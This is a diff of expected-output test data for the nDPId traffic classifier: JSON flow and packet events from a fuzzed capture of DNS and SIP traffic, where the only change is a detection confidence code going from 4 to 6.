00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":287,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120469956945,"flow_last_seen":1120469965955,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470150621,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2740,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00693{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":287,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1120469572981,"flow_last_seen":1120470129594,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":6089,"flow_avg_l4_payload_len":358,"midstream":0,"thread_ts_msec":1120470150621,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00693{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":287,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1120469572981,"flow_last_seen":1120470129594,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":6089,"flow_avg_l4_payload_len":358,"midstream":0,"thread_ts_msec":1120470150621,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":287,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470158623,"flow_last_seen":1120470158623,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470158623,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2757,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":1120470158623,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470158623,"pkt":"ADBUADRWAODtAW69CABFAABEaqcAAIARTK7AqAECwKgBAQrFADUAMEUJ3\/AAAAABAAAAAAAAATEBdgEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":287,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470158623,"flow_last_seen":1120470158623,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470158623,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2757,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.v.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":287,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470158623,"flow_last_seen":1120470158623,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470158623,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2757,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.v.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":2,"flow_last_seen":1120470158625,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470158625,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CsUARyeF3\/CAAAABAAEAAAAAAXMBMAElcwAyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} -00883{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":288,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470158623,"flow_last_seen":1120470158625,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470158625,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2757,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": 
{"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":293,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469973959,"flow_last_seen":1120469973959,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470162147,"l3_proto":"ip4","src_ip":"192.168.130.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2741,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00883{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":288,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470158623,"flow_last_seen":1120470158625,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470158625,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2757,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":293,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469973959,"flow_last_seen":1120469973959,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470162147,"l3_proto":"ip4","src_ip":"192.168.130.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2741,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":293,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469973957,"flow_last_seen":1120469973957,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470162147,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2741,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":293,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470170646,"flow_last_seen":1120470170646,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470170646,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2640,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":1120470170646,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470170646,"pkt":"ADBUADRWAODtAW69CABFAABIaqwAAIARTKXAqAECwKgBAQpQADUANOIMR\/IBAAABAAAAAAAABKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} -00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":293,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470170646,"flow_last_seen":1120470170646,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470170646,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2640,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":293,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470170646,"flow_last_seen":1120470170646,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470170646,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2640,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": 
{"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":294,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470171641,"flow_last_seen":1120470171641,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470171641,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2785,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":294,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1120470171641,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470171641,"pkt":"ADBUADRWAODtAW69CABFAABIaq0AAIARTKTAqAECwKgBAQrhADUANOIMR\/IBAAABAAAAAAAABF9zaXAEX3RkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":294,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470171641,"flow_last_seen":1120470171641,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470171641,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2785,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._tdp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":294,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470171641,"flow_last_seen":1120470171641,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470171641,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2785,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._tdp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470173644,"flow_last_seen":1120470173644,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470173644,"l3_proto":"ip4","src_ip":"192.168.37.115","dst_ip":"128.168.1.1","src_port":2758,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1120470173644,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470173644,"pkt":"ADBUADRWAODtAW69CABFAABIaq4AAIARTKPAqCVzgKgBAQrGADUANOIMR\/IBABwBAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":296,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470175647,"flow_last_seen":1120470175647,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470175647,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2758,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":296,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":1,"flow_last_seen":1120470175647,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470175647,"pkt":"ADBUADRWAODtAW69CABFAABIaq8AAIARTKLAqAECwKgBAQrGADUANOIMR\/IBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAIhAAE="} 
-00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":296,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470175647,"flow_last_seen":1120470175647,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470175647,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2758,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":545,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":296,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470175647,"flow_last_seen":1120470175647,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470175647,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2758,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":545,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":2,"flow_last_seen":1120470179653,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470179653,"pkt":"ADBUADRWAODtAW69CABFAABIarAAAIARTKHAqAECwKgBAQrGADUANOIMR\/IBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJZ3liZXJjaXR5AmRrAAAhAAE="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":297,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470175647,"flow_last_seen":1120470179653,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470179653,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2758,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.gybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":297,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470175647,"flow_last_seen":1120470179653,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470179653,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2758,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"_sip._udp.sip.gybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":298,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120469985981,"flow_last_seen":1120469994988,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470179653,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2742,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00608{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":298,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469986976,"flow_last_seen":1120469986976,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470179653,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2730,"dst_port":43690,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":298,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469986976,"flow_last_seen":1120469986976,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470179653,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2730,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":298,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470187655,"flow_last_seen":1120470187655,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470187655,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2759,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":1120470187655,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470187655,"pkt":"ADBUADRWAODtAW69CABFAABEarEAAIARTKTAqAECwKgBAQrHADUAMPwEKPMAAAABAAAAAAAAATEBMAEwAzEyNwdzbi1hZGRyBGFycGEAAAwAAQ=="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":298,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470187655,"flow_last_seen":1120470187655,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470187655,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2759,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.sn-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":298,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470187655,"flow_last_seen":1120470187655,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470187655,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2759,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.sn-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":299,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470187656,"flow_last_seen":1120470187656,"flow_idle_time":620000,"flow_min_l4_payload_len":71,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":71,"flow_avg_l4_payload_len":71,"midstream":0,"thread_ts_msec":1120470187656,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","l4_proto":37,"flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1120470187656,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470187656,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEAlcwDAqAEBwKgBAgA1CscAR96AKPOAAAABAAEAAAAAATFCMAEwAzEyNwdpbq1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} 
-00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":303,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470002989,"flow_last_seen":1120470002991,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470187658,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2743,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 